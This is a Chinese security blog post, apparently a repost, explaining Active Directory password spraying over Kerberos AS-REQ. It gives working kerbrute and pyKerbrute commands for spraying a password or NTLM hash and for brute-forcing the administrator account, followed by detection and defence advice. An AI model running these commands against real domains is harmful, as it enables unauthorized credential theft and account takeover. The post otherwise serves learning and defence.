0


内网安全之域内密码喷洒

域内密码喷洒一般和域内用户名枚举一起使用,可以在无域内凭据的情况下,通过枚举出域内存在的用户名,进而对域内存在的用户名进行密码喷洒,以此来获得域内有效凭据。
在Kerberos协议认证的AS-REQ阶段,请求包cname对应的值是用户名,当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。这种针对所有用户的自动密码猜测通常是为了避免账户被锁定,因为如果目标域设置了用户锁定策略的话,针对同一个用户的连续密码猜测会导致账户被锁定。所以只有对所有用户同时执行特定的密码登录尝试,才能增加破解的概率,消除账户被锁定的概率。普通的爆破就是用户名固定,爆破密码,但是密码喷洒,使用固定的密码去跑用户名。

域内密码喷洒工具

因此,当攻击者不在域内时,可以先通过域内用户名枚举来枚举出域内存在的用户。然后在进行域内密码喷洒,来尝试喷洒出有效的域用户密码。针对域内密码喷洒攻击,网上有很多开源项目。

1、kerbrute

下:

kerbrute_windows_amd64.exe passwordspray --dc 192.168.1.8 -d tmac.com user.txt admin@123

#passwordspray:密码喷洒模式
#--dc:指定域控 ip
#-d:指定域名
# user.txt:用户名字典文件,里面的字典可不加域名后缀

在这里插入图片描述

  • 如果通过查询得知目标域不存在密码锁定策略的话,则可以针对单个用户进行密码字典爆破,使用命令针对administrator域管理员进行密码字典爆破
  • 在这里插入图片描述

kerbrute_windows_amd64.exe bruteuser --dc 192.168.1.8 -d tmac.com pass.txt administrator
在这里插入图片描述

2、pyKerbrute

  • 项目地址:https://github.com/3gstudent/pyKerbrute
  • 一款使用 python 写的域用户枚举和密码喷洒脚本。其可以通过 tcp 和 udp 两种模式进行工作。user.txt 用户名文件格式不需要加后缀格式。密码喷洒模式 下,可以使用明文密码或者密码的 hash。密码喷洒命令如下:
#针对明文进行喷洒,tcp模式和udp模式
python2 ADPwdSpray.py 192.168.1.1 test.com user.txt clearpassword P@ssw0rd tcp
python2 ADPwdSpray.py 192.168.1.1 test.com user.txt clearpassword P@ssw0rd udp

#针对哈希进行喷洒,tcp模式和udp模式
python2 ADPwdSpray.py 192.168.1.1 test.com user.txt ntlmhash e19ccf75ee54e06b 06a5907af13cef42 tcp
python2 ADPwdSpray.py 192.168.1.1 test.com user.txt ntlmhash e19ccf75ee54e06b 06a5907af13cef42 udp

域内密码喷洒攻击防御

由于域内密码喷洒是通过发送大量的 AS-REQ 请求包,根据返回包的内容判断密码是否正确。因此可通过以下方法进行检测:

  • 流量层面的话,可通过检测同一IP在短时间内是否发送了大量的 AS-REQ 请求包来判断。如果同一 IP 在短时间内发送的大量的 AS-REQ 请求包(如 1 分钟>30 AS-REQ 包),则可判断为异常。
  • 日志层面的话,当口令爆破成功时,会产生如图所示事件 ID 为 4768 且结果代码为 0x0 的审核成功的 Kerberos 身份验证服务事件日志。 而口令爆破失败时,默认情况下并不会记录任何日志,因此日志层面不太好检测。

而针对域密码喷洒进行防御的话,可以要求员工设置强口令域密码,这对于域密码喷洒攻击可以起一个很好的防御作用。

标签: 安全

本文转载自: https://blog.csdn.net/weixin_45910629/article/details/137426110
版权归原作者 Tmac自留 所有, 如有侵权,请联系我们删除。

“内网安全之域内密码喷洒”的评论:

还没有评论